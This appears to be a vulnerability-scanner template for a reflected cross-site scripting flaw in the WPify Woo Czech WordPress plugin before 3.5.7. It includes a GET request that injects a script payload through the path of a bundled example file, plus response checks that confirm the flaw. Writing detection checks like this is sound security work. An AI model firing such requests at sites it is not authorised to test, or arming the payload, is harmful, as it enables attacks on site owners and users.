product: WordPress
vName: WordPress WPify Woo Czech Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 3
vDesc: WordPress WPify Woo Czech plugin before 3.5.7 contains a cross-site scripting vulnerability. The plugin uses the Vies library 2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first. The issue is only exploitable when the web server has the PDO driver installed and write access to the example directory.
version: <3.5.7
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>
    verify:
      logic: and
      check:
        - body:
            value:
              - '"><script>alert(document.domain)</script>'
              - Add a new VAT ID to the queue
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
